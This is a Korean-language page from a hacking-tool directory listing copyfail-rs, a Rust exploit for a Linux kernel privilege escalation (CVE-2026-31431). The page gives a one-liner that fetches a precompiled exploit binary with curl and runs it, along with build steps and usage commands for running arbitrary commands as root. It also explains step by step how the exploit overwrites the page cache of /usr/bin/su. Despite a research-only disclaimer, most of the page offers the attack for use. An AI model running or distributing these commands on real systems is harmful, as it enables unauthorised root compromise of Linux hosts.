Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
copyfail-rs — Copy Fail 익스플로잇 (CVE-2026-31431)을 Rust로 구현. | Kitploit
도구/GitHubGitHub/sammwyy/copyfail-rs
Privilege EscalationExploit FrameworksVulnerability AnalysisExploitationPayload DevelopmentBinary Exploitation
GitHubsammwyy/copyfail-rs

copyfail-rs

Copy Fail 익스플로잇 (CVE-2026-31431)을 Rust로 구현.

저장소 보기
14244개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

copyfail-rs

Copy Fail 익스플로잇(CVE-2026-31431)의 Rust 구현으로, AF_ALG와 splice()를 연결하여 4바이트 페이지 캐시 쓰기를 달성하는 치명적인 취약점이며, 주요 Linux 배포판에서 로컬 권한 상승으로 이어집니다.

Xint Code의 연구 및 PoC를 기반으로 합니다.

면책 조항

[!CAUTION] 이 프로젝트는 교육 및 연구 목적으로만 사용됩니다. 소유하지 않았거나 명시적 테스트 허가를 받지 않은 시스템에서 이 익스플로잇을 실행하는 것은 불법이며 비윤리적입니다. 유사한 취약점을 이해하고 방어하기 위해 이 코드를 책임감 있게 사용하십시오.

기능

  • 순수 Rust: 원본 Python PoC의 고성능, 메모리 안전 구현.
  • 동적 ELF 빌더: 런타임에 익스플로잇 페이로드를 프로그래밍 방식으로 구성하여 사용자 정의 명령을 허용합니다.
  • 제로 카피 익스플로잇: libc를 통해 Linux 커널의 AF_ALG 및 splice() 시스템 콜과 직접 상호 작용합니다.
  • 사용자 정의 가능: CLI 인수를 통해 root로 실행하려는 명령을 지정할 수 있습니다.

빠른 시작(원라이너)

사전 컴파일된 PoC 바이너리를 직접 다운로드하여 실행할 수 있습니다:

root@kitploit:~
curl -L https://github.com/sammwyy/copyfail-rs/releases/download/poc/copyfail-rs_x86-64 -o copyfail-rs && chmod +x copyfail-rs && ./copyfail-rs

사전 요구 사항

  • CVE-2026-31431에 취약한 Linux 커널(일반적으로 2026년 4월 패치 이전의 커널).
  • 읽기 권한이 있는 대상 바이너리에 대한 접근(기본값은 /usr/bin/su).

설치

리포지토리를 클론하고 바이너리를 빌드합니다:

root@kitploit:~
git clone https://github.com/sammwyy/copyfail-rs.git
cd copyfail-rs
cargo build --release

사용법

인수 없이 익스플로잇을 실행하면 기본값으로 /bin/sh가 실행됩니다:

root@kitploit:~
./target/release/copyfail-rs

또는 root로 실행할 사용자 정의 명령을 지정합니다:

root@kitploit:~
./target/release/copyfail-rs "whoami > /tmp/pwned"

작동 방식

이 익스플로잇은 Linux 커널의 Crypto API(AF_ALG) 내 authencesn 구현의 버그를 활용합니다. MSG_MORE와 함께 sendmsg를 splice()와 연결하면 악성 ELF 페이로드로 임의 파일(예: /usr/bin/su)의 페이지 캐시의 작은 청크를 덮어쓸 수 있습니다.

  1. 소켓 설정: AF_ALG 소켓을 생성하고 authencesn(hmac(sha256),cbc(aes))에 바인딩합니다.
  2. 페이로드 생성: 대상 명령을 root 권한으로 실행하는 최소 ELF를 메모리에 구성합니다.
  3. 캐시 주입: AF_ALG 취약점을 사용하여 페이로드를 대상 파일의 페이지 캐시에 반복적으로 스플라이스합니다.
  4. 트리거: 수정된 대상 파일을 실행하여 주입된 셸코드를 실행합니다.

참고 자료

  • 원본 블로그 게시물 - Xint Code
  • CVE-2026-31431 세부 정보
도구 다운로드